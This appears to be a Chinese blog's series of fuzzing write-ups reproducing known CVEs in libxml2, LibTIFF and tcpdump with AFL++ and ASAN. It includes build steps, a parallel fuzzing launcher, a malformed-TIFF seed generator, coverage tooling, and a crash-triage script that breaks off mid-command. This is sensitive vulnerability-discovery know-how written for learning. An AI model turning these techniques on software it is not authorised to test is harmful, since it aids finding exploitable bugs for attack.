熵餘記事

CVE-2017-9048: libxml2

Mon, 09 Mar 2026 00:00:00 GMT

import CveCard from "@components/misc/CveCard.astro";

CVE-2017-9048

Description

Compile

Download

git clone https://github.com/GNOME/libxml2.git && cd libxml2
git checkout v2.9.4

Build

由于这个漏洞发生在 valid.c 的 xmlSnprintfElementContent 中，所以我们可以禁用一些无关的东西来提高 fuzzing 效率。

./autogen.sh
AFL_USE_ASAN=1 \
CC=afl-clang-lto \
CXX=afl-clang-lto++ \
./configure \
  --prefix="$(realpath ../libxml2-fuzz-asan)" \
  --disable-shared \
  --without-debug \
  --without-ftp \
  --without-http \
  --without-legacy \
  --without-python
make clean && \
AFL_USE_ASAN=1 make -j`nproc` && \
AFL_USE_ASAN=1 make install

每次耗时最长的就是「如何编译」……

看了一圈，报错原因全都是因为 invalid token at start of a preprocessor expression，而这个错误的产生又是因为 .in 文件中 @@ 占位多了一个空格，比如 @WITH_PUSH @，把那个空格去掉即可。

如果使用 grug-far.nvim，那可以用 @([^@\s]+)\s+@ 搜索，@$1@ 替换：

之后再次编译就没问题了。

说实话这个插桩数量确实有点吓人了，光插桩就用了十三分钟……所以一会儿我们必须多线程 fuzz 才行。

为了检查插桩是否成功，可以使用 ASAN_OPTIONS=help=1 ../libxml2-fuzz-asan/bin/xmllint，或者查看符号：nm ../libxml2-fuzz-asan/bin/xmllint | rg -i asan。

由于 ASAN 会占用大量内存，并造成 2x - 10x 的减速，所以建议是只开一个 ASAN 线程用来找错，剩下线程都用普通插桩的版本来快速探路提高吞吐量。

更多信息可参考 Notes for using ASAN with afl-fuzz 。

再编译一个普通版：

CC=afl-clang-lto \
CXX=afl-clang-lto++ \
./configure \
  --prefix="$(realpath ../libxml2-fuzz-lite)" \
  --disable-shared \
  --without-debug \
  --without-ftp \
  --without-http \
  --without-legacy \
  --without-python
make clean && \
make -j`nproc` && \
make install

Samples

由于随机编译很难凑出一个正确的 xml tag, 所以我们可以给 fuzzer 加上字典，增加它撞到正确格式的概率。AFL++ 提供了一些常用字典：

至于 corpus, libxml2 自己的 test 目录下就有一些，然后我又自己写了两个 <!DOCTYPE a []> 和 <a b="c">d</a>。

Fuzzing

xmllint 有很多选项，理想情况是尽可能都组合上用一遍，以便让它能探索到更多路径。

我写了个自动起多线程 fuzz 的脚本，并在参数池中随便放了几个参数：

#!/bin/bash

MASTER_BIN="../libxml2-fuzz-asan/bin/xmllint"
SLAVE_BIN="../libxml2-fuzz-lite/bin/xmllint"
INPUT_CORPUS="corpus"
OUTPUT_DIR="outs"
SHM_BASE="/dev/shm/fuzz"

# Arguments for the Master instance
MASTER_ARGS="--debug --valid"

# Argument pool for Slave instances
SLAVE_ARGS_POOL=(
  "--memory --oldxml10"
  "--postvalid"
)

# --- Dictionary Support ---
DICT_PATH="./dict/xml.dict"
DICT_OPT=""
if [ -d "$DICT_PATH" ] || [ -f "$DICT_PATH" ]; then
  DICT_OPT="-x $DICT_PATH"
fi

# --- Environment Check ---
if [ ! -f "$MASTER_BIN" ] || [ ! -f "$SLAVE_BIN" ]; then
  echo "[-] Error: Fuzzing binaries not found. Check your paths."
  exit 1
fi

TOTAL_THREADS=${1:-4}
if [ "$TOTAL_THREADS" -lt 1 ]; then
  echo "Usage: $0 [total_threads]"
  exit 1
fi

# --- Resume Logic ---
if [ -d "$OUTPUT_DIR/master" ]; then
  echo "[*] Existing output detected. Resuming fuzzing session..."
  INPUT_OPT="-i -"
else
  echo "[*] First run. Using input corpus: $INPUT_CORPUS"
  mkdir -p "$OUTPUT_DIR"
  INPUT_OPT="-i $INPUT_CORPUS"
fi

mkdir -p "$SHM_BASE"

# --- Launch Master (ASAN) ---
echo "[+] Launching Master (ASAN) | Args: $MASTER_ARGS @@"
mkdir -p "$SHM_BASE/master"
AFL_TMPDIR="$SHM_BASE/master" \
  afl-fuzz $INPUT_OPT \
  -o "$OUTPUT_DIR" \
  -m none \
  $DICT_OPT \
  -M master \
  -- "$MASTER_BIN" $MASTER_ARGS @@ >"$OUTPUT_DIR/master.log" 2>&1 &

# Brief sleep to let Master initialize
sleep 2

# --- Launch Slaves (Non-ASAN) ---
NUM_VARIANTS=${#SLAVE_ARGS_POOL[@]}

for i in $(seq 1 $((TOTAL_THREADS - 1))); do
  SLAVE_NAME="slave_$i"
  ARG_INDEX=$(((i - 1) % NUM_VARIANTS))
  CURRENT_ARGS=${SLAVE_ARGS_POOL[$ARG_INDEX]}

  echo "[+] Launching $SLAVE_NAME | Args: $CURRENT_ARGS @@"
  mkdir -p "$SHM_BASE/$SLAVE_NAME"

  AFL_TMPDIR="$SHM_BASE/$SLAVE_NAME" \
    afl-fuzz $INPUT_OPT \
    -o "$OUTPUT_DIR" \
    -m none \
    $DICT_OPT \
    -S "$SLAVE_NAME" \
    -- "$SLAVE_BIN" $CURRENT_ARGS @@ >/dev/null 2>&1 &
done

echo "------------------------------------------------------"
echo "[!] Successfully started $TOTAL_THREADS instances with @@ input mode."
echo "[!] Check status: afl-whatsup $OUTPUT_DIR"
echo "[!] Stop all:     pkill afl-fuzz"
echo "------------------------------------------------------"

搞明白怎么多线程 fuzz, 这个 chall 最关键的部分就算是完成了，至于跑出来的 crashes 中有没有我们期望的那个，要跑多久，已经意义不大了。所以，拜拜。

~说着，滚床上干了一个小时论文调研，下来一看发现已经有不少 crashes 了。~

哎呀这个 ASAN 又帅又好用，好喜欢 uwu

CVE-2016-9297: LibTIFF

Fri, 06 Mar 2026 00:00:00 GMT

import CveCard from "@components/misc/CveCard.astro";

CVE-2016-9297

Description

Compile

Download

虽然 Mitre 的 description 写是 4.0.6 版本的漏洞，但是 chall 的 description 说 4.0.4，那就用 4.0.4 吧。

git clone https://gitlab.com/libtiff/libtiff.git && cd libtiff
git checkout v4.0.4

Build

mkdir ../libtiff-build-fuzz
cd ../libtiff-build-fuzz
CC=afl-clang-lto \
CXX=afl-clang-lto++ \
../libtiff/configure \
  --prefix="$(realpath ../libtiff-fuzz)" \
  --disable-shared
make clean && make -j`nproc` && make install

mkdir ../libtiff-build-fuzz-asan
cd ../libtiff-build-fuzz-asan
AFL_USE_ASAN=1 \
CC=afl-clang-lto \
CXX=afl-clang-lto++ \
../libtiff/configure \
  --prefix="$(realpath ../libtiff-fuzz-asan)" \
  --disable-shared
make clean && AFL_USE_ASAN=1 make -j`nproc` && AFL_USE_ASAN=1 make install

make 的时候遇到两个定义不完整的报错，直接在 tif_predict.h 中加入下面两行即可：

#include "tiffio.h"
#include "tiffiop.h"

Samples

#!/usr/bin/env python

import os
import subprocess
import struct

def run_cmd(cmd):
    try:
        subprocess.run(cmd, check=True, capture_output=True)
    except subprocess.CalledProcessError as e:
        print(f"Error running {' '.join(cmd)}: {e}")

def create_minimal_tiff(filename, width=8, height=8):
    # Minimal 8x8 BW TIFF (1 bit per pixel)
    # Header
    header = b'II' + struct.pack('<HI', 42, 8) # II, 42, offset to IFD=8

    # IFD
    num_entries = 11
    ifd_offset = 8
    next_ifd_offset = 0

    # Tags:
    # 256 (Width), 257 (Height), 258 (BitsPerSample), 259 (Compression),
    # 262 (Photometric), 273 (StripOffsets), 277 (SamplesPerPixel),
    # 278 (RowsPerStrip), 279 (StripByteCounts), 282 (XRes), 283 (YRes)

    # Each entry is 12 bytes
    entries = []
    def add_entry(tag, type, count, value):
        entries.append(struct.pack('<HHII', tag, type, count, value))

    add_entry(256, 3, 1, width)  # Width
    add_entry(257, 3, 1, height) # Height
    add_entry(258, 3, 1, 1)      # BitsPerSample
    add_entry(259, 3, 1, 1)      # Compression (None)
    add_entry(262, 3, 1, 1)      # Photometric (MinIsBlack)
    add_entry(273, 4, 1, 8 + 2 + num_entries*12 + 4 + 16) # StripOffsets (after IFD and Res values)
    add_entry(277, 3, 1, 1)      # SamplesPerPixel
    add_entry(278, 3, 1, height) # RowsPerStrip
    add_entry(279, 4, 1, (width * height + 7) // 8) # StripByteCounts
    add_entry(282, 5, 1, 8 + 2 + num_entries*12 + 4) # XRes (offset)
    add_entry(283, 5, 1, 8 + 2 + num_entries*12 + 4 + 8) # YRes (offset)

    ifd = struct.pack('<H', num_entries) + b''.join(entries) + struct.pack('<I', next_ifd_offset)

    # Rational values for XRes, YRes (72/1)
    res_values = struct.pack('<IIII', 72, 1, 72, 1)

    # Image data (all zeros for simplicity)
    data = b'\x00' * ((width * height + 7) // 8)

    with open(filename, 'wb') as f:
        f.write(header)
        f.write(ifd)
        f.write(res_values)
        f.write(data)

def create_grayscale_tiff(filename, width=8, height=8, bpp=8):
    # Header
    header = b'II' + struct.pack('<HI', 42, 8)

    num_entries = 11
    entries = []
    def add_entry(tag, type, count, value):
        entries.append(struct.pack('<HHII', tag, type, count, value))

    data_offset = 8 + 2 + num_entries*12 + 4 + 16

    add_entry(256, 3, 1, width)  # Width
    add_entry(257, 3, 1, height) # Height
    add_entry(258, 3, 1, bpp)    # BitsPerSample
    add_entry(259, 3, 1, 1)      # Compression
    add_entry(262, 3, 1, 1)      # Photometric (MinIsBlack)
    add_entry(273, 4, 1, data_offset) # StripOffsets
    add_entry(277, 3, 1, 1)      # SamplesPerPixel
    add_entry(278, 3, 1, height) # RowsPerStrip
    add_entry(279, 4, 1, width * height * (bpp // 8)) # StripByteCounts
    add_entry(282, 5, 1, 8 + 2 + num_entries*12 + 4) # XRes
    add_entry(283, 5, 1, 8 + 2 + num_entries*12 + 4 + 8) # YRes

    ifd = struct.pack('<H', num_entries) + b''.join(entries) + struct.pack('<I', 0)
    res_values = struct.pack('<IIII', 72, 1, 72, 1)
    data = b'\x80' * (width * height * (bpp // 8)) # Gray data

    with open(filename, 'wb') as f:
        f.write(header)
        f.write(ifd)
        f.write(res_values)
        f.write(data)

def create_rgb_tiff(filename, width=8, height=8):
    header = b'II' + struct.pack('<HI', 42, 8)
    num_entries = 12
    entries = []
    def add_entry(tag, type, count, value):
        entries.append(struct.pack('<HHII', tag, type, count, value))

    bps_offset = 8 + 2 + num_entries*12 + 4
    res_offset = bps_offset + 6
    data_offset = res_offset + 16

    add_entry(256, 3, 1, width)  # Width
    add_entry(257, 3, 1, height) # Height
    add_entry(258, 3, 3, bps_offset) # BitsPerSample (3 values)
    add_entry(259, 3, 1, 1)      # Compression
    add_entry(262, 3, 1, 2)      # Photometric (RGB)
    add_entry(273, 4, 1, data_offset) # StripOffsets
    add_entry(277, 3, 1, 3)      # SamplesPerPixel
    add_entry(278, 3, 1, height) # RowsPerStrip
    add_entry(279, 4, 1, width * height * 3) # StripByteCounts
    add_entry(282, 5, 1, res_offset) # XRes
    add_entry(283, 5, 1, res_offset + 8) # YRes
    add_entry(284, 3, 1, 1)      # PlanarConfig (Contig)

    ifd = struct.pack('<H', num_entries) + b''.join(entries) + struct.pack('<I', 0)
    bps_values = struct.pack('<HHH', 8, 8, 8)
    res_values = struct.pack('<IIII', 72, 1, 72, 1)
    data = b'\xff\x00\x00' * (width * height) # Red image

    with open(filename, 'wb') as f:
        f.write(header)
        f.write(ifd)
        f.write(bps_values)
        f.write(res_values)
        f.write(data)

def create_palette_tiff(filename, width=8, height=8):
    header = b'II' + struct.pack('<HI', 42, 8)
    num_entries = 12
    entries = []
    def add_entry(tag, type, count, value):
        entries.append(struct.pack('<HHII', tag, type, count, value))

    cmap_offset = 8 + 2 + num_entries*12 + 4
    res_offset = cmap_offset + 256 * 3 * 2 # 256 colors, RGB, 2 bytes each
    data_offset = res_offset + 16

    add_entry(256, 3, 1, width)  # Width
    add_entry(257, 3, 1, height) # Height
    add_entry(258, 3, 1, 8)      # BitsPerSample
    add_entry(259, 3, 1, 1)      # Compression
    add_entry(262, 3, 1, 3)      # Photometric (Palette)
    add_entry(273, 4, 1, data_offset) # StripOffsets
    add_entry(277, 3, 1, 1)      # SamplesPerPixel
    add_entry(278, 3, 1, height) # RowsPerStrip
    add_entry(279, 4, 1, width * height) # StripByteCounts
    add_entry(282, 5, 1, res_offset) # XRes
    add_entry(283, 5, 1, res_offset + 8) # YRes
    add_entry(320, 3, 256 * 3, cmap_offset) # ColorMap

    ifd = struct.pack('<H', num_entries) + b''.join(entries) + struct.pack('<I', 0)

    # Color map: 256 RGB values, each 2 bytes (16-bit)
    cmap = b''
    for i in range(256): cmap += struct.pack('<H', i * 256) # Red
    for i in range(256): cmap += struct.pack('<H', i * 256) # Green
    for i in range(256): cmap += struct.pack('<H', i * 256) # Blue

    res_values = struct.pack('<IIII', 72, 1, 72, 1)
    data = bytes([i % 256 for i in range(width * height)])

    with open(filename, 'wb') as f:
        f.write(header)
        f.write(ifd)
        f.write(cmap)
        f.write(res_values)
        f.write(data)

def main():
    corpus_dir = "corpus"
    if not os.path.exists(corpus_dir):
        os.makedirs(corpus_dir)

    base_tiff = os.path.join(corpus_dir, "base_bw.tif")
    create_minimal_tiff(base_tiff)

    base_gray8 = os.path.join(corpus_dir, "base_gray8.tif")
    create_grayscale_tiff(base_gray8, bpp=8)

    base_gray16 = os.path.join(corpus_dir, "base_gray16.tif")
    create_grayscale_tiff(base_gray16, bpp=16)

    base_rgb = os.path.join(corpus_dir, "base_rgb.tif")
    create_rgb_tiff(base_rgb)

    base_palette = os.path.join(corpus_dir, "base_palette.tif")
    create_palette_tiff(base_palette)

    bases = [base_tiff, base_gray8, base_gray16, base_rgb, base_palette]

    # Use tiffcp to create variations
    compressions = ["none", "lzw", "zip", "packbits", "zstd"]
    for base in bases:
        base_name = os.path.basename(base).split('.')[0]
        for comp in compressions:
            out = os.path.join(corpus_dir, f"{base_name}_{comp}.tif")
            run_cmd(["tiffcp", "-c", comp, base, out])

            out_tile = os.path.join(corpus_dir, f"{base_name}_{comp}_tile.tif")
            run_cmd(["tiffcp", "-c", comp, "-t", "-w", "8", "-l", "8", base, out_tile])

    # Special compressions for BW
    for comp in ["g3", "g4"]:
        run_cmd(["tiffcp", "-c", comp, base_tiff, os.path.join(corpus_dir, f"bw_{comp}.tif")])

    # JPEG for RGB
    run_cmd(["tiffcp", "-c", "jpeg", base_rgb, os.path.join(corpus_dir, "rgb_jpeg.tif")])

    # BigTIFF
    run_cmd(["tiffcp", "-8", base_rgb, os.path.join(corpus_dir, "bigtiff_rgb.tif")])

    # Byte order
    run_cmd(["tiffcp", "-B", base_rgb, os.path.join(corpus_dir, "big_endian_rgb.tif")])

    # Planar configuration
    run_cmd(["tiffcp", "-p", "separate", base_rgb, os.path.join(corpus_dir, "separate_rgb.tif")])

    # Add some tags
    tagged_tiff = os.path.join(corpus_dir, "tagged_rgb.tif")
    run_cmd(["cp", base_rgb, tagged_tiff])
    run_cmd(["tiffset", "-s", "315", "Fuzzer", tagged_tiff])

    # Broken cases
    # Circular IFD (from base_bw)
    circular = os.path.join(corpus_dir, "circular.tif")
    with open(base_tiff, 'rb') as f:
        data = bytearray(f.read())
    # Find next_ifd_offset (last 4 bytes of IFD)
    # IFD starts at 8, has 11 entries (11*12=132), + 2 bytes for count = 134.
    # next_ifd_offset is at index 142
    if len(data) >= 146:
        data[142:146] = struct.pack('<I', 8)
        with open(circular, 'wb') as f:
            f.write(data)

    # Huge dimensions
    huge_dim = os.path.join(corpus_dir, "huge_dim.tif")
    create_minimal_tiff(huge_dim)
    run_cmd(["tiffset", "-s", "256", "1000000", huge_dim])
    run_cmd(["tiffset", "-s", "257", "1000000", huge_dim])

    # Invalid compression tag
    invalid_comp = os.path.join(corpus_dir, "invalid_comp.tif")
    create_minimal_tiff(invalid_comp)
    run_cmd(["tiffset", "-s", "259", "65535", invalid_comp])

    print(f"Generated {len(os.listdir(corpus_dir))} samples in {corpus_dir}")

if __name__ == "__main__":
    main()

除了 AI 生成的这些样本外，test/images/ 中也有一些样本可以拿来用。

Fuzzing

编译出来发现有一堆程序，哪个才是我们的目标呢？

查看 Mitre 给出的 references，其中 Bug 2590 - CVE-2016-9297: segfault in _TIFFPrintField (tif_print.c:127) 写道：

Triggered in libtiff 4.0.6 with AFL and ASAN. Only crashes if I LD_PRELOAD AFL's libdislocator (more info: https://github.com/mirrorer/afl/tree/master/libdislocator).

LD_PRELOAD=/root/afl-2.35b/libdislocator/libdislocator.so ./tiffinfo -i test000

由此可知我们 fuzz 的目标是 tiffinfo 。

我们将所有的输出参数都用上，以便提高覆盖率，这里只开了两个线程 fuzz：

mkdir -p /dev/shm/{normal,asan}

AFL_TMPDIR=/dev/shm/asan \
afl-fuzz -i corpus \
         -o outs \
         -m none \
         -M asan \
         -- ../libtiff-fuzz-asan/bin/tiffinfo -Dcjrsw @@

AFL_TMPDIR=/dev/shm/normal \
afl-fuzz -i corpus \
         -o outs \
         -m none \
         -S normal \
         -- ../libtiff-fuzz/bin/tiffinfo -Dcjrsw @@

刚跑了两分钟，ASAN 那个线程以每秒一百多 crashes 的速度产出……吓坏了（

Analysis

Coverage

这个 chall 主要是让我们使用 lcov 来生成覆盖率报告的，不过我选择 llvm-cov，而不是 lcov 。

先单独编译一个 cov 插桩的版本：

mkdir ../libtiff-build-cov
cd libtiff-build-cov
CC=clang \
CXX=clang++ \
CFLAGS="-fprofile-instr-generate -fcoverage-mapping" \
CXXFLAGS="$CFLAGS" \
../libtiff/configure \
  --prefix="$(realpath ../libtiff-cov)" \
  --disable-shared
make clean && AFL_USE_ASAN=1 make -j`nproc` && AFL_USE_ASAN=1 make install

然后可以使用如下脚本自动生成覆盖率报告：

#!/usr/bin/env python

import os
import subprocess
import glob
import argparse

def run_cmd(cmd, env=None):
    """Run a shell command and return the output."""
    try:
        result = subprocess.run(cmd, shell=True, env=env, capture_output=True, text=True)
        return result.returncode, result.stdout, result.stderr
    except Exception as e:
        return 1, "", str(e)

def main():
    parser = argparse.ArgumentParser(description="Generate llvm-cov report from AFL++ samples.")
    parser.add_argument("--bin", required=True, help="Path to the instrumented binary.")
    parser.add_argument("--samples", required=True, help="Directory containing AFL++ samples (e.g., output/default/queue).")
    parser.add_argument("--out", default="coverage_report", help="Directory to save the HTML report (default: coverage_report).")
    parser.add_argument("--profraw-dir", default="profraws", help="Directory to store intermediate .profraw files.")
    parser.add_argument("--args", default="", help="Additional arguments to pass to the binary (use {} as placeholder for sample path).")

    args = parser.parse_args()

    # Create directories
    if not os.path.exists(args.profraw_dir):
        os.makedirs(args.profraw_dir)
    if not os.path.exists(args.out):
        os.makedirs(args.out)

    # Find all samples
    samples = glob.glob(os.path.join(args.samples, "*"))
    # Filter only files (AFL++ directories might have subfolders)
    samples = [s for s in samples if os.path.isfile(s)]

    if not samples:
        print(f"No samples found in {args.samples}")
        return

    print(f"Found {len(samples)} samples. Running coverage...")

    # Set up environment for LLVM profile generation
    # %p is PID, %m is binary hash to avoid collisions
    env = os.environ.copy()

    for i, sample in enumerate(samples):
        profraw_path = os.path.abspath(os.path.join(args.profraw_dir, f"sample_{i}.profraw"))
        env["LLVM_PROFILE_FILE"] = profraw_path

        # Construct command
        if "{}" in args.args:
            cmd = f"{args.bin} {args.args.format(sample)}"
        else:
            cmd = f"{args.bin} {args.args} {sample}"

        print(f"[{i+1}/{len(samples)}] Running: {cmd}", end="\r")
        run_cmd(cmd, env=env)

    print("\nMerging profile data...")
    profdata_file = "merged.profdata"
    profraw_pattern = os.path.join(args.profraw_dir, "*.profraw")
    merge_cmd = f"llvm-profdata merge -sparse {profraw_pattern} -o {profdata_file}"
    rc, stdout, stderr = run_cmd(merge_cmd)

    if rc != 0:
        print(f"Error merging data: {stderr}")
        return

    print(f"Generating HTML report in {args.out}...")
    report_cmd = f"llvm-cov show {args.bin} -instr-profile={profdata_file} -format=html -output-dir={args.out}"
    rc, stdout, stderr = run_cmd(report_cmd)

    if rc != 0:
        print(f"Error generating report: {stderr}")
        return

    # Also generate a summary report
    print("\nCoverage Summary:")
    summary_cmd = f"llvm-cov report {args.bin} -instr-profile={profdata_file}"
    rc, stdout, stderr = run_cmd(summary_cmd)
    print(stdout)

    print(f"Report generated successfully in directory: {args.out}")
    print(f"You can view it by opening {os.path.join(args.out, 'index.html')} in a browser.")

if __name__ == "__main__":
    main()

./gen_coverage.py --bin ./bin/tiffinfo --args "-Dcjrsw {}" --samples ../libtiff-workshop/outs/asan/queue

最后的 web 报告如下：

出于进度优先的考虑，之后的（包括前面的 libtiff）chall 我都没有深入分析它们的漏洞成因，想着早点把 fuzz 基本要点都玩明白后去自己写一个结合了 AI 的 fuzzer 。还有一个原因是 Fuzzing 101 的可复现性不怎么高，能不能跑出和 CVE 描述对应的 crash 完全是看运气，所以意义不大，没必要浪费时间去磨一个一模一样的 crash 样本。

CVE-2017-13028: TCPdump

Mon, 02 Mar 2026 00:00:00 GMT

import CveCard from "@components/misc/CveCard.astro";

CVE-2017-13028

Description

Compile

Download

git clone https://github.com/the-tcpdump-group/tcpdump.git && cd tcpdump
git checkout tcpdump-4.9.2

阅读 README 我们可知，要编译 TCPdump 需要先编译 libpcap 。由于 TCPdump-4.9.2 的最后一次提交是九年前的，因此对应的最匹配的 libpcap 应该是十年前的 1.8.1 版本。

git clone https://github.com/the-tcpdump-group/libpcap.git && cd libpcap
git checkout libpcap-1.8.1

Build

根据 chall 的说明，我们需要开启 ASAN 来 fuzz，故配置的时候需要加入 AFL_USE_ASAN=1 变量。

CC=clang CXX=clang++ CFLAGS="-O0 -g -fno-inline -fno-builtin -fno-omit-frame-pointer" CXXFLAGS="$CFLAGS" ./configure --enable-shared=no --prefix="$(realpath ../workshop/libpcap-debug)" --disable-bluetooth --disable-dbus
make -j`nproc` && make install
make clean

AFL_USE_ASAN=1 CC=afl-clang-lto CXX=afl-clang-lto++ ./configure --enable-shared=no --prefix="$(realpath ../workshop/libpcap-fuzz)" --disable-bluetooth --disable-dbus
AFL_USE_ASAN=1 make -j`nproc` && AFL_USE_ASAN=1 make install

接下来编译 tcpdump，遇到如下报错：

原因是它忽略了我们传入的 LDFLAGS 和 CPPFLAGS，强制要求 libpcap 的目录和 tcpdump 在同级，且名字固定为 libpcap 。解决方法是使用 --with-system-libpcap 参数。虽然我们的 libpcap 是安装到自定义路径，而非系统级安装的，但是用了这个参数后，如果系统目录下没找到 libpcap，它就会去我们传入的环境变量里找。

然后又遇到了新的问题：

我们可以通过 config.log 查看详细报错信息：

可见报错原因是 ISO C99 之后不再支持隐式声明导致的。解决方法是通过 -Wno-error=implicit-int 告诉编译器将 implicit-int 的错误当成 warning 处理，而非 error 。

CC=clang \
CXX=clang++ \
CFLAGS="-O0 -g -fno-inline -fno-builtin -fno-omit-frame-pointer \
        -Wno-error=implicit-int" \
CXXFLAGS="$CFLAGS" \
LDFLAGS="-L$(realpath ../workshop/libpcap-debug/lib)" \
CPPFLAGS="-I$(realpath ../workshop/libpcap-debug/include)" \
./configure \
  --prefix="$(realpath ../workshop/tcpdump-debug)" \
  --with-system-libpcap

现在 configure 阶段是通过了，make 一下，又是一堆报错：

大概翻了一下，错误种类还不少，一个个解决吧。

首先是部分文件报 incomplete element type 'const struct tok'。这是因为编译器只看到了声明没有看到定义，不知道这个结构体的具体成员有什么，我们只需要在每个报这样错误的文件中加入完整定义即可。

先 grep 一下，可知这个 struct tok 定义在 netdissect.h 中：

那我们直接在报错的文件 l2vpn.h 中加入 #include "netdissect.h" 就好了。

接下来是有些文件报 unknown type name 'uint32_t' 这种错，直接在报错的那个文件里加入 #include <stdint.h> 即可。

对于 incomplete type 'struct in6_addr'，我们只要导入 #include <netinet/in.h> 就好了。

然后是 redefinition of 'UNALIGNED' with a different type: 'struct ip6_ext' vs 'struct ip6_hdr' 这种重定义，先 grep 看看 UNALIGNED 是个啥：

可见它就是一个结构体属性宏，同时默认声明为 #define UNALIGNED __attribute__((packed))，既然是重定义，解决方法也很简单，我们在对应的文件顶部加入如下代码即可：

#ifndef UNALIGNED
#define UNALIGNED __attribute__((packed))
#endif

之后 unknown type name 'netdissect_options' 也是一样，找定义它的头文件，然后在缺失的头文件中导入即可，依然是 #include "netdissect.h"。

这样一路 patch 下来，就解决的差不多了，直接编译；

make clean && make -j`nproc` && make install

至于这个奇怪的 libpcap 1.9.0，是因为它 VERSION 文件里写的 1.9.0，但 release tag 打的确实是 1.8.1，不重要。

总结：修这种头文件风暴，有的时候就像打地鼠一样，修好一个蹦出来 19 个都是常有的事……边修边骂好吧（

然后编译一份用来 fuzz 的：

make clean
AFL_USE_ASAN=1 \
CC=afl-clang-lto \
CXX=afl-clang-lto++ \
CFLAGS="-Wno-error=implicit-int" \
CXXFLAGS="$CFLAGS" \
LDFLAGS="-L$(realpath ../workshop/libpcap-fuzz/lib)" \
CPPFLAGS="-I$(realpath ../workshop/libpcap-fuzz/include)" \
./configure \
  --prefix="$(realpath ../workshop/tcpdump-fuzz)" \
  --with-system-libpcap
AFL_USE_ASAN=1 make -j`nproc` && AFL_USE_ASAN=1 make install

Samples

<s>要准备报文样本不容易，也很容易。</s> 不容易在，我们不可能自己去用它抓包弄点报文，也不确定 AI 能不能生成（应该可以），容易在，tcpdump 提供的测试用例里有各种各样的报文：

这里我直接用它提供的测试报文作为初始语料库。

此外，既然都是抓包工具，那大名鼎鼎的 wireshark 是不是也提供了这种测试报文？

确实有，不过由于 tcpdump 的测试报文库已经很丰富了，如果我 fuzz 不出来再去用 wireshark 的。

Fuzzing

开始之前先确定一下怎么用，随便传一个测试数据包看看：

执行需要很长时间，所以我们 fuzz 的时候需要手动添加 -t 1000+ 将超时时间增加到一秒钟，+ 表示让 afl++ 根据平均时间动态缩放这个 timeout 值，但是始终保持在我们设定的上限之内，AFL_TMPDIR=/dev/shm 是为了保护我们的硬盘寿命，而 -m none 则是因为 ASAN 会占用大量内存，虽然有 OOM 的风险，但是建议开启。当然也有其它解决方案，比如：Notes for using ASAN with afl-fuzz。

ASAN_OPTIONS="detect_leaks=0:abort_on_error=1:symbolize=0" AFL_TMPDIR=/dev/shm afl-fuzz -i corpus -o outs -s 1337 -t 1000+ -m none -- ./tcpdump-fuzz/sbin/tcpdump -vvvvXX -ee -nn -r @@

fuzzer 开始工作，我们也该去打游戏了，让它在后台慢慢跑吧～

结果跑了半天毛都没出，受不了了，直接看官方题解，官方题解用的是 1.8.0，虽然 1.8.1 显然是更接近的版本，不懂啊，不懂，但是不妨碍我试试……也有可能版本号是以 VERSION 文件中定义的为准？或许是这个原因吧，不管了……

把之前的都删了重头来过，这里我只写编译 libpcap 1.8.0 的指令，其它的不变。

configure 后 make 依旧遇到很多报错，这次我不打算禁用 dbus 和 bluetooth 了，手动 patch 一下好了。

查看报错信息，发现都是因为不知道 pcap_t 和 pcap_if_t 导致的，并且 grep 发现它们定义在同一个文件中，那我们在每一个报错的文件头加入 #include "pcap.h" 就行。

CC=clang CXX=clang++ CFLAGS="-O0 -g -fno-inline -fno-builtin -fno-omit-frame-pointer" CXXFLAGS="$CFLAGS" ./configure --enable-shared=no --prefix="$(realpath ../workshop/libpcap-debug)"
make -j`nproc` && make install
make clean

AFL_USE_ASAN=1 CC=afl-clang-lto CXX=afl-clang-lto++ ./configure --enable-shared=no --prefix="$(realpath ../workshop/libpcap-fuzz)"
AFL_USE_ASAN=1 make -j`nproc` && AFL_USE_ASAN=1 make install

编译完 libpcap 后开开心心去编译 tcpdump，本以为会很顺遂，然后一 make：

我还能说什么呢？还是得把 dbus 禁用啊，还得再重新编译一遍 libpcap，我……草……

还能咋办，加上 --disable-dbus 再来一遍呗！/骂骂咧咧

结果呢？结果我发现只关 dbus 不够，还要解决一下 libusb 和 canusb……

AFL_USE_ASAN=1 CC=afl-clang-lto CXX=afl-clang-lto++ ./configure --enable-shared=no --prefix="$(realpath ../workshop/libpcap-fuzz)" --disable-dbus --disable-usb --disable-canusb

现在总算是解决了，让它慢慢跑去吧～祈祷可以跑出点 crashes 来。

难过了，早上起来一看，11 个小时，毛都没出，然后又过了一个早八，依旧无果。非但无果，还又发现了一些新的路径……合着我 fuzz 一晚上一直在探路啊。

后来，我发现了俩个傻逼……

解决方法是除了 configure 的时候需要 AFL_USE_ASAN=1 外，make 的时候也要。

现在这样才算是编译进去了，之前不显示 Compiled with AddressSanitizer/CLang.……

然后继续挂机，看看这次能不能出点货来。

历经两个小时，终于出现 crash 了！

Analysis

分析之前先把 debug 版本编译出来：

CC=clang \
CXX=clang++ \
CFLAGS="-O0 -g -fno-inline -fno-builtin -fno-omit-frame-pointer \
        -fsanitize=address" \
CXXFLAGS="$CFLAGS" \
./configure \
  --enable-shared=no \
  --prefix="$(realpath ../workshop/libpcap-debug)" \
  --disable-dbus
  --disable-usb \
  --disable-canusb

CC=clang \
CXX=clang++ \
CFLAGS="-O0 -g -fno-inline -fno-builtin -fno-omit-frame-pointer \
        -Wno-error=implicit-int \
        -fsanitize=address" \
CXXFLAGS="$CFLAGS" \
LDFLAGS="-L$(realpath ../workshop/libpcap-debug/lib)" \
CPPFLAGS="-I$(realpath ../workshop/libpcap-debug/include)" \
./configure \
  --prefix="$(realpath ../workshop/tcpdump-debug)" \
  --with-system-libpcap

然后看看第一个 crash：

很遗憾，并不是我们要复现的那个 CVE，继续挂机……

又是跑了一晚上加一个早八的时间，一晚上跑出来六百多个重复的 crashes，早上关掉去重后继续跑，跑出来十个：

但是用 gdb 这么一查，并没有我们要复现的那个 CVE 的 crash……

检测脚本如下：

#!/usr/bin/env bash

TARGET="./tcpdump-debug/sbin/tcpdump"
CRASH_DIR="./outs_v3/default/crashes"
OUTPUT_LOG="crash_reports.log"

>"$OUTPUT_LOG"

echo "[+] Analysing crashes in $CRASH_DIR..."

export ASAN_OPTIONS="detect_leaks=0:abort_on_error=1:symbolize=1"

for crash_file in "$CRASH_DIR"/id:*; do
  [ -e "$crash_file" ] || continue

  echo "--------------------------------------------------" >>"$OUTPUT_LOG"
  echo "File: $(basename "$crash_file")" >>"$OUTPUT_LOG"

  gdb --batch --quiet \
    --ex "run" \
    --ex "bt" \
    --ex "quit" \
